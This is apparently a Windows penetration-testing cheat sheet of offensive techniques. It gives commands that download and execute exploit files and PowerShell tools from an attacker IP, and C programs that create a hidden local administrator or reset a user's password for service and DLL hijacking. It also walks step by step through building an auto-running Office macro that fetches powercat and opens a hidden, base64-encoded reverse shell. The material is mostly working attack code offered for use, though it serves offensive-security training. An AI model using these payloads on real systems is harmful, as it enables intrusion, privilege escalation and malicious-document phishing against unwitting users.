Miscellaneous

A collection of nifty tricks and hacks to make your Windows pentesting smarter, faster, and stealthier.

Downloading files in windows machine

Method 1

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"

Method 2

certutil -urlcache -split -f http://192.168.1.1/exploit.exe

Method 3

iwr -uri http://192.168.1.1/Powerview.ps1 -Outfile PowerView.ps1

Method 4

iex(new-object net.webclient).downloadstring('http://192.168.1.1/Invoke-ADEnum.ps1')

Method 5

using Impacket-smb command in kali machine to create SMB server

impacket-smbserver -smb2support smb tools/

Downloading it in windows machine using copy command

copy \\192.168.1.1\smb\PowerView.ps1

Download files from windows to Kali machine

Method 1

Enable SSH in Kali Machine using command below

sudo service ssh start

Use below command in windows machine to push the file into kali

scp "C:\path\to\local\file.txt" kali@<Kali_IP_Address>:/home/kali/destination/directory/

Cross Compilation of code in kali

Below command will help you to create a quick exe file for windows machine push and execute it

i686-w64-mingw32-gcc program.c -o exploit.exe

C-Programs to do malicious activities in windows

Prog 1 : To add user in windows machine

This will help to add user Pawan with Password 123! and add the user into Administrator Group

#include <stdlib.h>

int main ()
{
  int i;

  i = system ("net user pawan 123!  /add");
  i = system ("net localgroup administrators pawan /add");

  return 0;
}

Prog 2 : To change passowd of a user

This program will change the password of the user Pawan

#include <stdlib.h>

int main() {
    int i;

    i = system("net user Pawan NewPassword456!");

    return 0;
}

tip

Above programs can be used in Service Binary Hijacking , DLL Hijacking , Unquoted Service Paths etc. and can be cross compiled to create .exe file using the commands given in this section

Get reverse Shell from Macro

You can download this python scrpipt RevShellMacro.py to do the work just enter the IP address and port , The default http port is 80 to download the powercat from kali machine.

Below is the detailed method of doing the same Just in case if you want to do the hard work.

Step 1. Get the powercat command for reverse shell

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

This command downloads file powercat.ps1 from your kali machine and executes for reverseshell on port 4444

Step 2. Base64 encode your command

pwsh

$Text="IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.230/powercat.ps1');powercat -c 192.168.45.230 -p 4444 -e powershell"

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText =[Convert]::ToBase64String($Bytes)

$EncodedText
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA

Step 3. Divide your commands into chunks using python3

Assign the command to a variable

>>> my_str = "powershell.exe -nop -w hidden -enc <base64_encoded_command>"

deciding the size of the chunk and execting it .

>>> n = 50
>>> [print('Str = Str + "' + my_str[i:i+n] + '"') for i in range(0, len(my_str), n)]

Below is the result of the above commands

└─$ python3                                                                 
Python 3.13.3 (main, Apr 10 2025, 21:38:51) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> my_str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAb\
gB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwAC8AcABvAHcAZQByAGMAYQB0AC4AcAB\
zADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA\
GwA"
>>> n = 50
>>> [print('Str = Str + "' + my_str[i:i+n] + '"') for i in range(0, len(my_str), n)]
... 
Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
Str = Str + "DIALgAxADYAOAAuADQANQAuADIAMwAwAC8AcABvAHcAZQByAGM"
Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwACAALQB"
Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
Str = Str + "GwA"

Step 4. Put everything together in macro

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
     Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
     Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
     Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
     Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
     Str = Str + "DIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGM"
     Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
     Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQB"
     Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
     Str = Str + "GwA"


    CreateObject("Wscript.Shell").Run Str
End Sub

Downloading files in windows machine​

Download files from windows to Kali machine​

Cross Compilation of code in kali​

C-Programs to do malicious activities in windows​

Get reverse Shell from Macro​

Step 1. Get the powercat command for reverse shell​

Step 2. Base64 encode your command​

Step 3. Divide your commands into chunks using python3​

Step 4. Put everything together in macro​